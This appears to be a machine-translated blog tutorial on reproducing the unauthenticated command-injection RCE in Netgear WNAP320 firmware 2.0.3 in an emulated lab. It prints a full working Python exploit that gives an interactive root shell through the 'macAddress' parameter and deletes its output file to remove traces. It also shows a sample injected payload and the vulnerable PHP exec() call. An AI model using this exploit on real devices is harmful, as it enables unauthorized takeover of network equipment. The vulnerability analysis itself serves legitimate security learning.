[ Zero basis to learn IoT Pwn] Reappear Netgear WNAP320 RCE
0x00 Preface :
This is a [ Zero basis to learn IoT Pwn] The second part of , In the previous article, after we set up the simulation environment , The simulation is running Netgear WNAP320 The firmware , So this time, we will directly carry out actual combat , Carry out zero foundation learning in practice hahaha .
0x01 Bug Search for :
Search for bug There are many ways , For example, online websites https://www.exploit-db.com/, Or directly Baidu search the corresponding router model , What I use here is searchsploit To search .
You can see that there is something to match bug macAddress Remote code execution , And there are corresponding POC.
0x02 POC analysis :
poc as follows :
# Exploit Title: Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)
# Vulnerability: Remote Command Execution on /boardDataWW.php macAddress parameter
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# IoT Device: Netgear WNAP320 Access Point
# Version: WNAP320 Access Point Firmware v2.0.3
import requests
import sys
if(len(sys.argv) != 2):
print('Must specify the IP parameter')
print("eg: python3 wnap320_v2_0_3.py <IP>")
sys.exit(0)
host = sys.argv[1]
port = 80
cmd = ''
while(True):
cmd = input('Shell_CMD$ ')
#injecting system command part writing the command output to a output file
data = {
'macAddress' : '112233445566;' + cmd + ' > ./output #',
'reginfo' : '0',
'writeData' : 'Submit'
}
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
if(response.ok):
#read the command output result
url = 'http://' + host + '/output'
cmdOutput = requests.get(url)
print(cmdOutput.text)
#remove trace
cmd = 'rm ./output'
data = {
'macAddress' : '112233445566;' + cmd + ' #',
'reginfo' : '0',
'writeData' : 'Submit'
}
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
else:
print('[!] No response from the server.')
The operation results are as follows :( You can succeed in getting shell And is root The powers of the )
Next, analyze this in detail POC.
The code analysis
First of all, see this paragraph , Here use input Accept commands entered by the user , And then this data It's a json data , Normally, it should be macAddress:MAC Address 、reginfo:0、writeData:submit, But because he has the loophole of command injection , So we can inject commands into macAddress Causes arbitrary command execution .
cmd = input('Shell_CMD$ ')
#injecting system command part writing the command output to a output file
data = {
'macAddress' : '112233445566;' + cmd + ' > ./output #',
'reginfo' : '0',
'writeData' : 'Submit'
}
{
'macAddress': '112233445566;whoami > ./output #',
'reginfo' : '0',
'writeData' : 'Submit'
}//" Use semicolons to splice commands and redirect output to output In file "
Next, analyze this fragment , You can see that the vulnerability appears in http://192.168.0.100/boardDataWW.php This page ,python with post Send the packet , Then go to request the output from the command line output file ( The command line will show ), Finally, call vulnerability deletion again output This ECHO text , Complete a remote code execution .
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
if(response.ok):
#read the command output result
url = 'http://' + host + '/output'
cmdOutput = requests.get(url)
print(cmdOutput.text)
#remove trace
cmd = 'rm ./output'
data = {
'macAddress' : '112233445566;' + cmd + ' #',
'reginfo' : '0',
'writeData' : 'Submit'
}
url = 'http://' + host + '/boardDataWW.php'
response = requests.post(url, data=data)
else:
print('[!] No response from the server.')
0x03 Manual recurrence learning :
You can access directly without logging into the router http://192.168.0.100/boardDataWW.php, So this router can be unauthorized RCE.
Fill in any data here , And then use burp Grab a bag and have a look .
here Web Front end detection Mac Format of address , The format should be :112233445566.
The packet format is as follows :
Manually test the execution of the command bug.
0x04 Loophole principle :
First, we get it in the firmware package boardDataWW.php file , Then analyze its source code .
The first is php In the document html Code , Here is a form , There is a text box macAddress, The content has user input . When we click submit When you submit the button , Will respond to checkMAC function .
<body align="center">
<form name="hiddenForm" action="boardDataWW.php" method="post" align="center">
<td width="70%">
<input type="text" id="macAddress" name="macAddress" label="MAC Address" value="<?php echo $_REQUEST['macAddress'] ?>" onasdf="checkMAC(this.value);">
<small>* Format: xxxxxxxxxxxx (x = Hex String)</small>
</td>
<td width="30%" class="right">
<input type="submit" name="writeData" value="Submit" onclick="checkMAC(event, document.getElementById('macAddress').value);">
</td>
<td width="70%"><input type="reset" name="reset" value="Reset Form"></td>
</form>
</body>
checkMAC The main function of the function is to judge what the user has entered MAC Is the address format correct , Include 12 Characters that are numbers and letters .
<html>
<head>
<title>Netgear</title>
<script type="text/javascript">
<!--
function checkMAC(eventobj,mac) {
if (!(/^[0-9A-Fa-f]{12,12}$/.test(mac))) {
.....
}
</script>
</head>
</html>
Then this paragraph will be executed after submitting the form php Code for , He first made a judgment in the packet , Judge writeDatad Whether the data of is empty , If it is not empty, continue to judge mac Whether the address data is empty and judge reginfo Whether the data of is empty , Then I judged again mac Is the format of the address correct , If these conditions are correct, enter the branch and execute the next code .
Then came the code that caused the vulnerability , stay php In the call exec function .
<?php
$flag=false;
$msg='';
if (!empty($_REQUEST['writeData'])) {
// Conduct mac Determination of address input format , For example, the format meets [0-9a-fA-F] character string .
if (!empty($_REQUEST['macAddress']) && array_search($_REQUEST['reginfo'],Array('WW'=>'0','NA'=>'1'))!==false && ereg("[0-9a-fA-F]{12,12}",$_REQUEST['macAddress'],$regs)!==false)
{
// Here, because it directly macAddress Spliced with the command , Therefore, there is a vulnerability of command injection !
exec("wr_mfg_data -m ".$_REQUEST['macAddress']." -c ".$_REQUEST['reginfo'],$dummy,$res);
if ($res==0) {
conf_set_buffer("system:basicSettings:apName netgear".substr($_REQUEST['macAddress'], -6)."\n");
conf_save();
$msg = 'Update Success!';
$flag = true;
}
}
else
$flag = true;
}
?>
And then call exec perform "wr_mfg_data -m ".$_REQUEST['macAddress']." -c ".$_REQUEST['reginfo'], Here you can see his splicing User input content And execute it as an order , This will happen Command injection vulnerability .
wr_mfg_data It's a change MAC Address program .
And when we inject MAC At the address , We'll use ; Semicolon to add an extra executed command , Those two orders will be executed .
0x05 PWN Vegetable chicken team
Welcome to the group to discuss PWN skill 、RE reverse .
![[commercial terminal simulation solution] Shanghai daoning brings you Georgia introduction, trial and tutorial](/img/44/b65aaf11b1e632f2dab55b6fc699f6.jpg)
![[IOT completion. Part 2] stm32+ smart cloud aiot+ laboratory security monitoring system](/img/b2/e8f81ecda6f5f4fc65501aaf9f13cf.gif)